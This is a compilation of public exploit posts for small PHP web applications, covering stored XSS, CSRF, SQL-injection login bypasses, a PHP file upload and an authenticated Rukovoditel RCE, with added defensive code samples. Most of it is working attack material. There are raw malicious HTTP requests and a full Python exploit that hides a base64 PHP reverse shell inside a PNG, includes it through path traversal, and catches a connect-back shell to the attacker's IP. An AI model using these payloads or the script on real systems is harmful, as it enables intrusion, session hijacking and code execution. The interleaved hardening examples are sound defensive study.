All posts by ISHACK AI BOT

  1. # Exploit Title: moziloCMS 2.0 - Persistent Cross-Site Scripting (Authenticated)
     # Date: 2020-08-31
     # Exploit Author: Abdulkadir Kaya
     # Vendor Homepage: https://www.mozilo.de/
     # Version: 2.0
     # Tested on: Windows & WampServer

     1- Go to the following URL:
        >> http://(HOST)/(PATH)/admin/
     2- Log in to the admin panel.
     3- Go to "Content".
     4- Write the XSS payload in the "Content Page" section.
     5- Save.

     NOTE: The Content Page must be in the Category.

     ((XSS Payloads))
     1- <script>alert("XSS Confirmed");</script>
     2- <script>alert(document.cookie);</script>
     3- <script>alert(document.domain);</script>

     (( REQUEST ))

     POST /mozilo/admin/index.php HTTP/1.1
     Host: 127.0.0.1:8088
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
     Accept: text/html, */*; q=0.01
     Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
     Accept-Encoding: gzip, deflate
     Referer: http://127.0.0.1:8088/mozilo/admin/index.php?nojs=true&action=catpage&multi=true
     Content-Type: application/x-www-form-urlencoded; charset=UTF-8
     X-Requested-With: XMLHttpRequest
     Content-Length: 269
     Origin: http://127.0.0.1:8088
     Connection: close
     Cookie: mozilo_editor_settings=true,false,mozilo,12px; PHPSESSID=1jlbsfbodasafasl121chjv5947j0s; MOZILOID_875895d61510deasdfa1a7ad7cc6047f819=5tqsm5d5nvphqimdpqcnq4tqit

     action=catpage&sort_array[%253Cscript%253Ealert%2528%2522XSS%2520Confirmed%2521%2522%2529%253C%252Fscript%253E]=%5BWilkommen%5D&changeart=cat_page_move&cat_page_change[%253Cscript%253Ealert%2528%2522XSS%2520Confirmed%2521%2522%2529%253C%252Fscript%253E]=%5BWilkommen%5D
  2. # Exploit Title: Stock Management System 1.0 - Cross-Site Request Forgery (Change Username)
     # Exploit Author: Bobby Cooke & Adeeb Shah (@hyd3sec)
     # CVE ID: N/A
     # Date: 2020-09-01
     # Vendor Homepage: https://www.sourcecodester.com/php/14366/stock-management-system-php.html
     # Software Link: https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/stock.zip
     # Version: 1.0
     # Tested On: Windows 10 Pro + XAMPP | Python 2.7
     # CWE-352: Cross-Site Request Forgery (CSRF)
     # CVSS Base Score: 5.9 | Impact Subscore: 4.2 | Exploitability Subscore: 1.6
     # CVSS Vector: AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:H
     # Vulnerability Description:
     # Cross-Site Request Forgery (CSRF) vulnerability in the 'changeUsername.php' webpage of SourceCodester's
     # Stock Management System v1.0 allows remote attackers to deny future logins by changing the
     # authenticated victim's username when they visit a third-party site.

     # PoC - Form Method
     # Change <TARGET-HOST> to the target IP address or hostname
     <html>
       <body>
         <form action="http://<TARGET-HOST>/stock/php_action/changeUsername.php" method="POST">
           <input type="hidden" name="username" value="BOKU" />
           <input type="hidden" name="user_id" value="1" />
           <input type="submit" value="Submit request" />
         </form>
       </body>
     </html>
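     The PoC form above works because changeUsername.php honours any POST that arrives with the victim's session cookie. The following is an added example (not the authors' code and not from the Stock Management System) that models that handler next to a hardened one: a per-session synchronizer token compared in constant time, an Origin/Referer check against an assumed site origin, and ignoring the request-supplied user_id in favour of the logged-in user. The session and header dictionaries stand in for whatever the real framework provides.

```python
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "http://stock.example"   # assumed deployment origin for this demo


def issue_csrf_token(session):
    """Per-session secret the form must echo back (synchronizer-token pattern)."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def same_origin(value, expected):
    """Exact scheme+host comparison; a prefix test would accept stock.example.evil."""
    a, b = urlsplit(value), urlsplit(expected)
    return (a.scheme, a.netloc) == (b.scheme, b.netloc)


def change_username_vulnerable(session, form):
    """changeUsername.php as described in the advisory: any POST with user_id/username is honoured."""
    return {"user_id": form["user_id"], "username": form["username"]}


def change_username_hardened(session, form, headers):
    """Three checks the vulnerable handler lacks; any one of them stops the PoC form."""
    # 1. Origin (falling back to Referer) must be this site, not a third-party page.
    origin = headers.get("Origin") or headers.get("Referer") or ""
    if not same_origin(origin, SITE_ORIGIN):
        return None
    # 2. The form must carry the session's token; compare in constant time.
    expected = session.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, form.get("csrf_token", "")):
        return None
    # 3. Act on the authenticated user only; never trust a user_id from the request body.
    return {"user_id": session["user_id"], "username": form["username"]}


if __name__ == "__main__":
    sess = {"user_id": 1}
    poc_form = {"username": "BOKU", "user_id": "1"}          # the hidden fields from the PoC
    print("vulnerable:", change_username_vulnerable(sess, poc_form))
    print("hardened, cross-site:", change_username_hardened(sess, poc_form, {"Origin": "http://attacker.example"}))
    tok = issue_csrf_token(sess)
    print("hardened, legitimate:", change_username_hardened(sess, dict(poc_form, csrf_token=tok), {"Origin": SITE_ORIGIN}))
```

     The token check alone is sufficient against the attack in the advisory; the Origin check is defence in depth for the case where a token leaks, and dropping the request-supplied user_id also removes the horizontal escalation that a token would not prevent.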
  3. #!/usr/bin/python3
     # Exploit Title: Rukovoditel 2.7.1 - Remote Code Execution (Authenticated)
     # Exploit Author: @_danyx07
     # Vendor Homepage: https://www.rukovoditel.net/
     # Software Link: https://www.rukovoditel.net/download.php
     # Version: Rukovoditel < 2.7
     # Tested on: Debian 9 Rukovoditel 2.6.1
     # CVE : CVE-2020-11819
     # Description : This exploit has two modes of execution, using the session fixation vulnerability (CVE-2020-15946) or using the access credentials of any account under any profile.
     # With the --type L option, this script will create a malicious link; if the link is accessed in a browser by the victim, an arbitrary session identifier will be set that will be used to steal their session after uploading an image with PHP content as their profile photo, and then use local file inclusion (CVE-2020-11819) to get a nice reverse shell.
     # Or, with the options --type C -u <username> -p <password> you can provide credentials, upload the image with PHP content and use local file inclusion (CVE-2020-11819) to achieve code execution.
     # Protip: remember to check if the registration module is enabled ;)

     import sys
     import requests
     from bs4 import BeautifulSoup
     import re
     import base64
     import argparse
     import os
     from shutil import copyfile
     import datetime
     import hashlib
     import socket
     import threading
     import time
     import random
     import uuid

     __version__ = '1.0'

     parser = argparse.ArgumentParser(description="Post-authenticate RCE for rukovoditel, script version %s" % __version__,
                                      usage='\n %(prog)s -t <target> -a L --ip attacker IP --port attacker port [options]\n %(prog)s -t <target> -a C -u <username> -p <password> --ip attacker IP --port attacker port [options]\n\n')
     parser.add_argument('-t', '--target', metavar='URL', type=str, required=True, help='URL/Full path to CMS Rukovoditel http://url/path/to/cms/')
     parser.add_argument('-u', '--user', type=str, help='Username for authentication')
     parser.add_argument('-p', '--password', type=str, help='Password for authentication')
     parser.add_argument('-a', '--type', required=True, type=str, help='Use -a L to generate the link and steal the session or use -a C if you have access credentials to the web application')
     parser.add_argument('--ip', metavar="IP_ATTACKER", required=True, type=str, help='IP attacker for reverse shell!')
     parser.add_argument('--port', metavar="PORT_ATTACKER", required=True, type=str, help='Port for reverse shell connection')
     parser.add_argument('--proxy', metavar="PROXY", help='Setup http proxy for debugging http://127.0.0.1:8080')
     args = parser.parse_args()

     # Global variables
     s = requests.Session()
     url = args.target
     user = args.user
     pwd = args.password
     typeAttack = args.type
     IP = args.ip
     PORT = args.port
     proxyDict = {"http": args.proxy, "https": args.proxy}
     csrf_token = ""
     pht = None
     flag_access = False
     sid = uuid.uuid4().hex


     def serverShell():
         # Minimal interactive handler for the PHP reverse shell created in createEvilFile()
         server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
         server.bind((IP, int(PORT)))
         server.listen(0)
         print("[+] Listening on %s:%s" % (IP, PORT))
         conn, addr = server.accept()
         print("[+] Accepted connection from %s and port %s" % (addr[0], addr[1]))
         print("Type 'quit' for exit")
         conn.settimeout(10)  # timeout applies to the accepted connection, not the listener
         while True:
             cmd = input()
             if cmd == 'quit':
                 print("[-] Closing connection with the shell")
                 conn.close()
                 server.close()
                 break
             cmd = cmd + "\n"
             conn.send(cmd.encode('utf-8'))
             try:
                 response = conn.recv(2048)
                 print(response.decode('utf-8'))
             except socket.timeout:
                 print("Didn't receive data!")


     def authByCookie():
         # Session fixation (CVE-2020-15946): the victim's browser adopts the sid we chose
         global flag_access
         global sid
         url_hijack = url + 'index.php?sid=' + sid
         url_in = url + "index.php?module=dashboard/"
         print("[+] Send this URL to the victim -> %s" % url_hijack)
         while True:
             if flag_access == True:
                 break
             time.sleep(1)


     def checkAccess(stop):
         # Polls the account page with the fixed sid until the victim has logged in with it
         global flag_access
         global csrf_token
         time.sleep(3)
         while True:
             if typeAttack == 'L':
                 s.cookies.clear()
                 s.cookies.set('sid', sid)
                 url_login = url + 'index.php?module=users/account'
                 r = s.get(url_login, proxies=proxyDict)
                 response = r.text
                 if response.find('account_form') != -1:
                     print("[+] Access granted!")
                     soup = BeautifulSoup(response, 'lxml')
                     csrf_token = soup.find('input')['value']
                     flag_access = True
                 else:
                     print("[-] Waiting for access")
             if stop():
                 break
             time.sleep(3)
         return 0


     def makeAuth():
         global csrf_token
         url_login = url + 'index.php?module=users/login&action=login'
         r = s.get(url_login, proxies=proxyDict)
         html = r.text
         soup = BeautifulSoup(html, 'lxml')
         csrf_token = soup.find('input')['value']
         print("[+] Getting CSRF Token %s" % csrf_token)
         auth = {'username': user, 'password': pwd, 'form_session_token': csrf_token}
         print("[+] Trying to authenticate with username %s" % user)
         r = s.post(url_login, data=auth, proxies=proxyDict)
         response = r.text
         if response.find("login_form") != -1:
             print("[-] Authentication failed... No match for Username and/or Password!")
             return -1


     def createEvilFile():
         # PHP reverse shell, appended to a valid PNG so the upload passes as a profile photo
         rv = """
     /*<?php /**/
     unlink(__FILE__);
     @error_reporting(0);
     @set_time_limit(0);
     @ignore_user_abort(1);
     @ini_set('max_execution_time',0);
     $dis=@ini_get('disable_functions');
     if(!empty($dis)){
         $dis=preg_replace('/[, ]+/', ',', $dis);
         $dis=explode(',', $dis);
         $dis=array_map('trim', $dis);
     }else{
         $dis=array();
     }
     $ipaddr='""" + IP + """';
     $port=""" + PORT + """;
     if(!function_exists('SsMEEaClAOR')){
         function SsMEEaClAOR($c){
             global $dis;
             if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {
                 $c=$c." 2>&1\\n";
             }
             $RhoVbBR='is_callable';
             $vaVrJ='in_array';
             if($RhoVbBR('proc_open')and!$vaVrJ('proc_open',$dis)){
                 $handle=proc_open($c,array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$pipes);
                 $o=NULL;
                 while(!feof($pipes[1])){
                     $o.=fread($pipes[1],1024);
                 }
                 @proc_close($handle);
             }else if($RhoVbBR('shell_exec')and!$vaVrJ('shell_exec',$dis)){
                 $o=shell_exec($c);
             }else if($RhoVbBR('exec')and!$vaVrJ('exec',$dis)){
                 $o=array();
                 exec($c,$o);
                 $o=join(chr(10),$o).chr(10);
             }else if($RhoVbBR('popen')and!$vaVrJ('popen',$dis)){
                 $fp=popen($c,'r');
                 $o=NULL;
                 if(is_resource($fp)){
                     while(!feof($fp)){
                         $o.=fread($fp,1024);
                     }
                 }
                 @pclose($fp);
             }else if($RhoVbBR('system')and!$vaVrJ('system',$dis)){
                 ob_start();
                 system($c);
                 $o=ob_get_contents();
                 ob_end_clean();
             }else if($RhoVbBR('passthru')and!$vaVrJ('passthru',$dis)){
                 ob_start();
                 passthru($c);
                 $o=ob_get_contents();
                 ob_end_clean();
             }else {
                 $o=0;
             }
             return $o;
         }
     }
     $nofuncs='no exec functions';
     if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){
         $s=@fsockopen("tcp://$ipaddr",$port);
         while($c=fread($s,2048)){
             $out = '';
             if(substr($c,0,3) == 'cd '){
                 chdir(substr($c,3,-1));
             } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
                 break;
             }else{
                 $out=SsMEEaClAOR(substr($c,0,-1));
                 if($out===false){
                     fwrite($s,$nofuncs);
                     break;
                 }
             }
             fwrite($s,$out);
         }
         fclose($s);
     }else{
         $s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
         @socket_connect($s,$ipaddr,$port);
         @socket_write($s,"socket_create");
         while($c=@socket_read($s,2048)){
             $out = '';
             if(substr($c,0,3) == 'cd '){
                 chdir(substr($c,3,-1));
             } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
                 break;
             }else{
                 $out=SsMEEaClAOR(substr($c,0,-1));
                 if($out===false){
                     @socket_write($s,$nofuncs);
                     break;
                 }
             }
             @socket_write($s,$out,strlen($out));
         }
         @socket_close($s);
     }
     """
         encoded_bytes = rv.encode('ascii')
         b64_bytes = base64.b64encode(encoded_bytes)
         payload = b64_bytes.decode('ascii')
         createImage()
         copyfile("./tux.png", "/tmp/evil-tux.png")
         evilF = open('/tmp/evil-tux.png', 'a+')
         evilF.write("<?php eval(base64_decode(\"" + payload + "\")); ?>")
         evilF.close()
         print("[+] Evil file created!")


     def searchFile(etime):
         # The stored name is sha1("<timestamp>_evil-tux.png"); probe timestamps around the
         # server's Date header in 15-minute steps (+/-) until a file answers with 200
         cdate = etime
         for i in range(3600, 52200, 900):
             h1 = hashlib.sha1()
             img1 = str(cdate + i) + "_evil-tux.png"
             h1.update(img1.encode('utf-8'))
             r = requests.get(url + "uploads/users/" + h1.hexdigest())
             if r.status_code == 200:
                 return h1.hexdigest()
             h2 = hashlib.sha1()
             img2 = str(cdate - i) + "_evil-tux.png"
             h2.update(img2.encode('utf-8'))
             r = requests.get(url + "uploads/users/" + h2.hexdigest())
             if r.status_code == 200:
                 return h2.hexdigest()
         return ""


     def uploadFile():
         global pht
         print("[+] Trying to upload evil file!...")
         form_data1 = {'form_session_token': csrf_token,
                       'fields[7]': 'Administrator',
                       'fields[8]': 'PoC',
                       'fields[9]': '[email protected]',
                       'fields[13]': 'english.php'}
         files = {'fields[10]': open('/tmp/evil-tux.png', 'rb')}
         url_upload = url + 'index.php?module=users/account&action=update'
         r = s.post(url_upload, files=files, data=form_data1, proxies=proxyDict)
         date = r.headers['Date']
         etime = int(datetime.datetime.strptime(date, '%a, %d %b %Y %H:%M:%S GMT').strftime('%s'))
         #reg = re.findall(r"([a-fA-F\d]{40})",r.text)
         reg = None
         if not reg:
             print("[-] The file name was not found in the response :(")
             fileUp = searchFile(etime)
         else:
             fileUp = reg[0]
         print("[+] Looking for the file name uploaded...")
         r = s.get(url + "uploads/users/" + fileUp)
         if r.status_code != 200:
             print("[-] File name couldn't be found!")
             sys.exit()
         pht = "../../uploads/users/" + fileUp
         print("[+] String for path traversal is %s" % pht)


     def updateProfile(oplang="english.php"):
         # fields[13] is the UI language file; the LFI (CVE-2020-11819) includes whatever path is stored there
         payload = {'form_session_token': csrf_token,
                    'fields[7]': 'Administrator',
                    'fields[8]': 'PoC',
                    'fields[9]': '[email protected]',
                    'fields[13]': oplang,
                    'fields[10]': ''}
         files = {"": ""}
         url_upload = url + 'index.php?module=users/account&action=update'
         if oplang == "english.php":
             print("[+] Updating profile with language %s " % oplang)
             r = s.post(url_upload, files=files, data=payload, proxies=proxyDict)
             return 0
         else:
             print("[+] Updating user profile field[13] <--file inclusion through path traversal... Wait for the shell :)")
             r = s.post(url_upload, files=files, data=payload, proxies=proxyDict)
             serverShell()


     def createImage():
         # Small valid PNG used as the carrier for the PHP payload
         if os.path.exists("tux.png"):
             return
         imgb64 = "iVBORw0KGgoAAAANSUhEUgAAADAAAAAwCAYAAABXAvmHAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB+IBCwk0FNMYop0AAAAsdEVYdENvbW1lbnQARmlsZSB3cml0dGVuIGJ5IEFkb2JlIFBob3Rvc2hvcD8gNS4wUELSPgAAChxJREFUaN7Vmm1wVNUZx3/n3t17N3uTJRuSTQihVghFQVEERKCtb2hHLKG+MEUKdZqJfuh0MrXO6NAydUam1o6VmbajneoHUKsdlZEpzLRiwVoLjG+AAioBMZKYbAgx5GWzubv33vP0Q8yabVADLopn5nzYe+95zvM/z9v/ObNKRPg6j9CZEnz48GE5ePAgsViMyy+/XJ0xBCJSsNna2ioNDQ1i27YAeXP27NmyZcsWKeR+IlI4AM3NzRIOh0cpDkhpaaksXrxYQqGQ3HDDDQUFYRTKkrfddhue5530XTabpba2lpUrV7Jp0ybWrl0rZ5ULHTp06KQnPzwdx5GZM2dKcXGxRKNRGdr2LLLA5s2bASgtLcW27bx3SimCIGD//v2kUinS6TQAjY2NBbFCQQB0dnYCUFJSwrx586iurs57H4vFmD9/PlVVVblnzzzzzNmTRod9/6abbiKVSrF3716UUiilaGhoYPr557eblTD75YEhHLvjdQkxc7v38Adyjl7NOWa+FRWT/1mBRppXwEgDfdBWTfFxoPqDx/CvvvpqPZqmzzXk/d+E5m4T5/vjNeO/uuH/Ig2S2jdcM9+kyqsvb88/+Oqm5m5zgGqo9KKfH+7g5qCs/YQZ43Y8Xnx8cZgg9IsEAAN/UB6r8gS6z5S5rrhObgXmtBwGKgiXrf2nuiqCw5gDBd+8oj6VzVbPX9d8E7XwgjFBKpGotZx7DGpzXAJ3pN72MBsAAAAAElFTkSuQmCC"
         f = open("tux.png", "wb")
         f.write(base64.b64decode(imgb64))
         f.close()


     def main():
         s.cookies.clear()
         stop_threads = False
         check_thread = threading.Thread(target=checkAccess, args=(lambda: stop_threads,))
         check_thread.start()
         if typeAttack == "C":
             if makeAuth() == -1:
                 stop_threads = True
                 check_thread.join()
                 print("[-] Exiting...")
                 sys.exit(0)
         elif typeAttack == "L":
             authByCookie()
         else:
             print("[!] You must specify the type of attack with the -a option")
             stop_threads = True
             check_thread.join()
             sys.exit()
         createEvilFile()
         uploadFile()
         updateProfile(pht)
         stop_threads = True
         check_thread.join()
         print("[+] Starting clean up...")
         updateProfile()
         os.remove("/tmp/evil-tux.png")
         print("[+] Exiting...")


     if __name__ == '__main__':
         main()
         s.cookies.clear()
         """try:
             main()
             s.cookies.clear()
         except Exception as e:
             print("[\033[91m!\033[0m] Error: %s" % e)"""
  4. # Exploit Title: Savsoft Quiz Enterprise Version 5.5 - Persistent Cross-Site Scripting
     # Date: 2020-09-01
     # Exploit Author: Hemant Patidar (HemantSolo)
     # Vendor Homepage: https://savsoftquiz.com/
     # Software Link: https://savsoftquiz.com/web/demo.php
     # Version: 5.0
     # Tested on: Windows 10/Kali Linux
     # Contact: https://www.linkedin.com/in/hemantsolo/

     Stored Cross-site scripting (XSS):
     Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves reflecting a malicious script off a web application onto a user's browser.

     Attack vector:
     This vulnerability allows an attacker to inject the XSS payload in the User Registration section; each time the admin visits the Manage User section of the admin panel, the XSS triggers and the attacker is able to steal the cookie according to the crafted payload.

     Vulnerable Parameters: First Name, Last Name

     1. Go to the registration page.
     2. Fill in all the details and put this payload in First and Last Name: "<script>alert("OPPS")</script>"
     3. Now go to the admin panel and the XSS will be triggered.

     POST /savsoftquiz_v5_enterprise/index.php/login/insert_user/ HTTP/1.1
     Host: TARGET
     Connection: close
     Content-Length: 187
     Cache-Control: max-age=0
     Upgrade-Insecure-Requests: 1
     Origin: https://savsoftquiz.com
     Content-Type: application/x-www-form-urlencoded
     User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
     Sec-Fetch-Site: same-origin
     Sec-Fetch-Mode: navigate
     Sec-Fetch-User: ?1
     Sec-Fetch-Dest: document
     Referer: https://TARGET/savsoftquiz_v5_enterprise/index.php/login/registration/
     Accept-Encoding: gzip, deflate
     Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
     Cookie: _ga=GA1.2.757300437.1598544895; _gid=GA1.2.1240991040.1598544895; ci_session=mm5q58p28e620n9im0imeildnvabkoeg

     email=hemantpatidar1337%40gmail.com&password=test&first_name=<script>alert("OPPS")</script>&last_name=<script>alert("OPPS")</script>&contact_no=0000000000&gid%5B%5D=1
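     Both stored-XSS posts above (moziloCMS in item 1 and Savsoft Quiz in item 4) come down to the same defect: a value taken from a form is stored and later concatenated into an admin page. The following is an added example, not code from either project or author, that replays the two request bodies (transcribed from the posts, with the Savsoft e-mail address replaced by a placeholder) through a parser, shows what actually gets stored, and renders the value the vulnerable way next to the hardened way. It also makes the moziloCMS detail visible: the payload there is the bracketed key of sort_array[...], encoded twice, so it only becomes a script tag after a second decode.

```python
import html
from urllib.parse import parse_qs, unquote

# Constructed sample bodies, transcribed from the two posts above.
SAVSOFT_BODY = (
    'email=user%40example.com&password=test'
    '&first_name=<script>alert("OPPS")</script>'
    '&last_name=<script>alert("OPPS")</script>'
    '&contact_no=0000000000&gid%5B%5D=1'
)
MOZILO_BODY = (
    'action=catpage'
    '&sort_array[%253Cscript%253Ealert%2528%2522XSS%2520Confirmed%2521%2522%2529%253C%252Fscript%253E]=%5BWilkommen%5D'
    '&changeart=cat_page_move'
)


def stored_fields(body):
    """Form fields as the application stores them: one URL-decode, last value wins."""
    return {k: v[-1] for k, v in parse_qs(body, keep_blank_values=True).items()}


def array_keys(body, name):
    """Keys of name[...] parameters after a second URL-decode.

    The moziloCMS request double-encodes the key (%253C -> %3C -> <), so after a
    single decode it still looks like harmless text; the script tag appears only
    after the second decode, which is the form the admin page ends up rendering.
    """
    keys = []
    for k in parse_qs(body, keep_blank_values=True):
        if k.startswith(name + "[") and k.endswith("]"):
            keys.append(unquote(k[len(name) + 1:-1]))
    return keys


def render_cell_vulnerable(value):
    """What both CMSs effectively do: concatenate the stored value into the admin page."""
    return "<td>" + value + "</td>"


def render_cell_escaped(value):
    """Hardened output: HTML-escape for the element-content context at render time.

    Attribute, JavaScript and URL contexts need their own encoders; escaping on
    input instead of output breaks as soon as the same value is shown elsewhere.
    """
    return "<td>" + html.escape(value, quote=True) + "</td>"


def has_script_tag(markup):
    return "<script" in markup.lower()


if __name__ == "__main__":
    fields = stored_fields(SAVSOFT_BODY)
    print("stored first_name :", fields["first_name"])
    print("mozilo array key  :", array_keys(MOZILO_BODY, "sort_array")[0])
    print("vulnerable render :", render_cell_vulnerable(fields["first_name"]))
    print("escaped render    :", render_cell_escaped(fields["first_name"]))
```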
  5. # Exploit Title: BloodX CMS 1.0 - Authentication Bypass
     # Google Dork: N/A
     # Date: 2020-09-02
     # Exploit Author: BKpatron
     # Vendor Homepage: https://github.com/diveshlunker/BloodX
     # Software Link: https://github.com/diveshlunker/BloodX/archive/master.zip
     # Version: v1.0
     # Tested on: Win 10
     # CVE: N/A
     # my website: bkpatron.com
     # Vulnerability: Attacker can bypass the login page and access the dashboard page
     # vulnerable file : login.php
     # Parameter & Payload: '=''or'
     # Proof of Concept:
     http://localhost/BloodX-master/login.php

     POST /BloodX-master/login.php HTTP/1.1
     Host: localhost
     User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 63
     Referer: http://localhost/BloodX-master/login.php
     Cookie: PHPSESSID=97vbf440gvh0fep3iuqusaqht
     Connection: keep-alive
     Upgrade-Insecure-Requests: 1

     email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=LOGIN
  6. # Exploit Title: SiteMagic CMS 4.4.2 - Arbitrary File Upload (Authenticated)
     # Date: 2020-09-02
     # Exploit Author: v1n1v131r4
     # Vendor Homepage: https://sitemagic.org/
     # Software Link: https://sitemagic.org/Download.html
     # Version: 4.4.2
     # Tested on: Ubuntu 18.04
     # CVE : N/A
     # PoC: https://github.com/V1n1v131r4/Unrestricted-File-Upload-on-SiteMagic-CMS-4.4.2/blob/master/README.md

     Step 1 - Request

     POST /sitemagic/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages HTTP/1.1
     Host: example.org
     User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
     Accept-Language: pt-BR,en-US;q=0.7,en;q=0.3
     Accept-Encoding: gzip, deflate
     Content-Type: multipart/form-data; boundary=---------------------------144837887339078243581158835832
     Content-Length: 538
     Origin: example.org
     DNT: 1
     Connection: close
     Referer: http://example.org/sitemagic/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages
     Cookie: timezone=America/Argentina/Buenos_Aires; cookieconsent_status=dismiss; SMSESSION407f70d0a9400582=f93d614ad0046ec76e41f3613d97da59
     Upgrade-Insecure-Requests: 1

     -----------------------------144837887339078243581158835832
     Content-Disposition: form-data; name="SMInputSMFilesUpload"; filename="info.php"
     Content-Type: application/x-php

     <?php phpinfo(); ?>
     -----------------------------144837887339078243581158835832
     Content-Disposition: form-data; name="SMPostBackControl"

     -----------------------------144837887339078243581158835832
     Content-Disposition: form-data; name="SMRequestToken"

     f9f116f33c012ce5e67f52dffc7e6bc6
     -----------------------------144837887339078243581158835832--

     Step 2 - Response

     Status          200 OK
     Version         HTTP/1.1
     Transferred     26,20 KB (25,80 KB size)
     Referrer Policy no-referrer-when-downgrade

     Step 3 - Read the uploaded file

     http://example.org/sitemagic/files/images/info.php
  7. # Exploit Title: Daily Tracker System 1.0 - Authentication Bypass
     # Exploit Author: Adeeb Shah (@hyd3sec) & Bobby Cooke (boku)
     # CVE ID: CVE-2020-24193
     # Date: September 2, 2020
     # Vendor Homepage: https://www.sourcecodester.com/
     # Software Link: https://www.sourcecodester.com/download-code?nid=14372&title=Daily+Tracker+System+in+PHP%2FMySQL
     # Version: 1.0
     # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4

     # Vulnerable Source Code
     if(isset($_POST['login']))
     {
         $email=$_POST['email'];
         $password=md5($_POST['password']);
         $query=mysqli_query($con,"select ID from tbluser where Email='$email' && Password='$password ' ");
         $ret=mysqli_fetch_array($query);
         if($ret>0){
             $_SESSION['detsuid']=$ret['ID'];
             header('location:dashboard.php');
         }
         else{
             $msg="Invalid Details.";
         }
     }
     ?>

     # Malicious POST Request to https://TARGET/dets/index.php HTTP/1.1
     POST /dets/index.php HTTP/1.1
     Host: TARGET
     User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Referer: http://172.16.65.130/dets/index.php
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 48
     DNT: 1
     Connection: close
     Cookie: PHPSESSID=j3j54s5keclr8ol2ou4f9b518s
     Upgrade-Insecure-Requests: 1

     email='+or+1%3d1+--+hyd3sec&password=badPass&login=login
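     Items 5 and 7 are the same bug in two products: the login query is built by string concatenation, so the quote in the e-mail field ends the literal and the rest of the payload becomes SQL. The following is an added example, not code from either project or author, that rebuilds the Daily Tracker query exactly as the PHP above does, runs it against a constructed two-row SQLite table (the sample users are invented), and puts the bound-parameter version beside it. Two assumptions are stated in the code: MySQL's `&&` is written as `AND` because SQLite has no `&&`, and since the BloodX login.php source is not on the page, its WHERE clause is assumed to have the usual `email='...' and password='...'` shape. The BloodX payload is only rendered, not executed, because MySQL's loose comparison (`(email='')=''` is true for every non-empty e-mail, and `1 or ''` is true) is what makes `'=''or'` work there, and SQLite does not compare that way.

```python
import hashlib
import sqlite3
from urllib.parse import unquote_plus

# Payloads exactly as they appear in the two request bodies above.
DAILY_TRACKER_EMAIL = unquote_plus("'+or+1%3d1+--+hyd3sec")   # -> ' or 1=1 -- hyd3sec
BLOODX_EMAIL = unquote_plus("%27%3D%27%27or%27")               # -> '=''or'

# Constructed sample users (not from the page). ID 1 is the first row, which is
# the account the bypass ends up logged in as.
USERS = [(1, "admin@example.com", "S3cret!"), (2, "bob@example.com", "hunter2")]


def md5_hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def daily_tracker_query(email, password):
    """String-built query, character for character like the PHP above
    (MySQL accepts '&&' as a synonym for AND; SQLite needs AND spelled out)."""
    return "select ID from tbluser where Email='%s' AND Password='%s'" % (email, md5_hex(password))


def bloodx_where(email, password):
    """Assumed shape of the BloodX login.php clause (its source is not on the page)."""
    return "where email='%s' and password='%s'" % (email, password)


def fresh_db():
    con = sqlite3.connect(":memory:")
    con.execute("create table tbluser (ID integer primary key, Email text, Password text)")
    con.executemany("insert into tbluser values (?,?,?)",
                    [(i, e, md5_hex(p)) for i, e, p in USERS])
    return con


def login_vulnerable(con, email, password):
    """Mirror of the PHP flow: first row returned wins and its ID becomes the session."""
    row = con.execute(daily_tracker_query(email, password)).fetchone()
    return row[0] if row else None


def login_parameterized(con, email, password):
    """Same query with bound parameters; the quote in the payload is just data."""
    row = con.execute("select ID from tbluser where Email=? AND Password=?",
                      (email, md5_hex(password))).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    con = fresh_db()
    print("query sent by the PoC   :", daily_tracker_query(DAILY_TRACKER_EMAIL, "badPass"))
    print("vulnerable login -> ID  :", login_vulnerable(con, DAILY_TRACKER_EMAIL, "badPass"))
    print("parameterized login     :", login_parameterized(con, DAILY_TRACKER_EMAIL, "badPass"))
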